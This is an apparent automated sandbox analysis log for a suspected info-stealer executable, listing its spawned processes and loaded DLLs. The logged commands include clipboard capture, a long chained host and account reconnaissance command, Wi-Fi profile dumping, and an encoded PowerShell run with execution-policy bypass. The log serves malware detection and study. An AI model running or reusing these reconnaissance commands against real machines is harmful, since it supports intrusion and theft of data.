                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: RuntimeusererVers.exe, 00000000.00000003.1328498281.0000015CDDE4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: RuntimeusererVers.exeReversingLabs: Detection: 39%
                      Source: RuntimeusererVers.exeString found in binary or memory: %lu.%lu.%lu.%lu.in-addr.arpa
                      Source: RuntimeusererVers.exeString found in binary or memory: can't send non-None value to a just-started generator
                      Source: RuntimeusererVers.exeString found in binary or memory: %lu.%lu.%lu.%lu.in-addr.arpa
                      Source: RuntimeusererVers.exeString found in binary or memory: can't send non-None value to a just-started generator
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeFile read: C:\Users\user\Desktop\RuntimeusererVers.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\systeminfo.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
                      Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded command omitted]
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded command omitted]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded command omitted]
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                      Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand [Base64-encoded command omitted]
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: python311.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: vcruntime140.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: libffi-8.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: sqlite3.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: python3.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: libcrypto-1_1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: libssl-1_1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                      Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
                      Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
